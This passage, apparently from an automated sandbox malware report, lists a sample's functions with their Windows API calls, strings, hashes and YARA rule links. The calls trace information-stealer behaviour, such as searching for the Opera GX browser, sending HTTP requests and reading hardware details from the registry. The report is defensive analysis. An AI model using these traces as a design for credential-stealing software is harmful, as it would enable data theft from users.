                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00402539
                                                                                                                                                                                                  • Part of subcall function 0040232A: ??_U@YAPAXI@Z.MSVCRT ref: 004023AF
                                                                                                                                                                                                • memset.MSVCRT ref: 00402562
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3248666761-0
                                                                                                                                                                                                • Opcode ID: 56d512cd650d7da32bd0f446be5566ee4961e3d79870d63763c05bef8aae14ff
                                                                                                                                                                                                • Instruction ID: 009d821118f090afdc25ade215e33f6b4a4e9640787576255bfffd64c02f4d4b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56d512cd650d7da32bd0f446be5566ee4961e3d79870d63763c05bef8aae14ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF044B6D45218B7CB10ABA4DD09FCE7B7C9F14304F4000A6B945F3091D9B897C48BA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040C740 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 457COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040C745
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00424C1E,00424C1B,?,?,?), ref: 0040C78F
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040B20D: _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040B20D: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040B20D: memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                • String ID: #$Opera GX
                                                                                                                                                                                                • API String ID: 2375657845-1046280356
                                                                                                                                                                                                • Opcode ID: 8866180c248b04107ceca5b02e10f312feb85f5beb80ce1b124fe179e79141c5
                                                                                                                                                                                                • Instruction ID: a684bc4bbdfdd742dd69a8864078cee1b8c31bdc79ed69174b03648f1a7ae84f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8866180c248b04107ceca5b02e10f312feb85f5beb80ce1b124fe179e79141c5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B0280B190024CEADF04EBE6D946ADEBBB8AF15304F10456FE445732C2DB781B18DB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B49FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?,?), ref: 1B49FE03
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • winRead, xrefs: 1B49FE3D
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B49FE78
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                • API String ID: 2738559852-1843600136
                                                                                                                                                                                                • Opcode ID: 58db7b8644488676fb928779716aa6e564040abf7404ed06bab8c93298f02520
                                                                                                                                                                                                • Instruction ID: 9b9df00a12a0ec12a708bc468b00b4bbadf7eea6aded18a13cd8dbcd08b2ed36
                                                                                                                                                                                                • Opcode Fuzzy Hash: 58db7b8644488676fb928779716aa6e564040abf7404ed06bab8c93298f02520
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5412A726043456BC704EE64DD81AEBBBE9FFC8610F844A2DF545C3640E735F9188BA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0041224D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00412252
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041226F
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412333
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrlen
                                                                                                                                                                                                • String ID: ERROR
                                                                                                                                                                                                • API String ID: 2133942097-2861137601
                                                                                                                                                                                                • Opcode ID: a87326763ab26b5bf997aa19061bf6032c3bda0a8255bfd92b573cb4ac70b026
                                                                                                                                                                                                • Instruction ID: 81628774b56aed9d0f5020bfdca245de47ae03dea59a744ffdf6c1e7acfd63da
                                                                                                                                                                                                • Opcode Fuzzy Hash: a87326763ab26b5bf997aa19061bf6032c3bda0a8255bfd92b573cb4ac70b026
                                                                                                                                                                                                • Instruction Fuzzy Hash: 013193B1D00248EFCB00EBAAD946BDD7FB4AF15314F10846EF505B7282DB389658CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00411F59 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00411F5E
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00404F61: _EH_prolog.MSVCRT ref: 00404F66
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FC9
                                                                                                                                                                                                  • Part of subcall function 00404F61: StrCmpCA.SHLWAPI(?), ref: 00404FDD
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405000
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405036
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040505A
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405065
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405083
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411FBC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                • String ID: ERROR$ERROR
                                                                                                                                                                                                • API String ID: 1120091252-2579291623
                                                                                                                                                                                                • Opcode ID: 91eacdcf851b3d8d85c681b5090c5120ca816d5547e4b74d7fec90f52f836fe4
                                                                                                                                                                                                • Instruction ID: 6b2d634253405be8c5f43d4141b9d53bbe17c28d9337b4cfcffda792731edf8e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 91eacdcf851b3d8d85c681b5090c5120ca816d5547e4b74d7fec90f52f836fe4
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9217FB0900249DADB00FBA6C546BDD7BB4AF19308F50449EE845732C2DB785B18CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FFEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,b9A), ref: 00410004
                                                                                                                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041001F
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410026
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                • String ID: b9A
                                                                                                                                                                                                • API String ID: 3183270410-3142400736
                                                                                                                                                                                                • Opcode ID: bc527b734b92f9eba7d41ed0cd07446c584826262838bdca42fc7cf2ed07d18c
                                                                                                                                                                                                • Instruction ID: 94146815f73e90882d50ab05f7cdea788e8ccce751a04c66c5f7543adfc6d98a
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc527b734b92f9eba7d41ed0cd07446c584826262838bdca42fc7cf2ed07d18c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93F03075905228BBEB60AB90DC09FDA3B69AB09715F000051BE85A71D0DBB49AC48B94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00413452 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00412387: _EH_prolog.MSVCRT ref: 0041238C
                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004134DB
                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2678630583-0
                                                                                                                                                                                                • Opcode ID: a7b9f64791e70cf1c0a29bdf069b9ccecdfe24c4a1e9e9e8f6d04d9af182eda4
                                                                                                                                                                                                • Instruction ID: cdd2cd2622ea30bd84fe18c8e1ac9c10eef98ce14977c551e77fd85709594c3d
                                                                                                                                                                                                • Opcode Fuzzy Hash: a7b9f64791e70cf1c0a29bdf069b9ccecdfe24c4a1e9e9e8f6d04d9af182eda4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F311075900158EFCB01DFA5C985ADE7BB8FF15304F10456BF802A7291DB789B88CB95
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EE07 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C), ref: 0040EE1B
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C,00000000,?), ref: 0040EE22
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EE40
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EE5C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3676486918-0
                                                                                                                                                                                                • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                                                                                                                                • Instruction ID: 8df98c4356d6ba5c673d2f3e4e9eaa3c3292b94e57536a3ef5c29255e46278c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF05E7A240218FFFB109BD1DD0EFAA7A7EEB49B40F101025FB01A61A0D7B05910DB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040232A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: X%@$X%@
                                                                                                                                                                                                • API String ID: 0-1360290420
                                                                                                                                                                                                • Opcode ID: cdd6bf8acb1831ea22f9c716b98bf9ca8420b0d814f1c98a3a420e7b2a83f701
                                                                                                                                                                                                • Instruction ID: cf7e05bcfaffb67bdf61be98b9eede3023c8ead03337331c96351d350a792ce1
                                                                                                                                                                                                • Opcode Fuzzy Hash: cdd6bf8acb1831ea22f9c716b98bf9ca8420b0d814f1c98a3a420e7b2a83f701
                                                                                                                                                                                                • Instruction Fuzzy Hash: B54126716001199FCB11CF69D8806E97BB1FF89318F2484BADD55EB3D1C6B86A82CF94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00407212 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00407217
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040744E
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407462
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
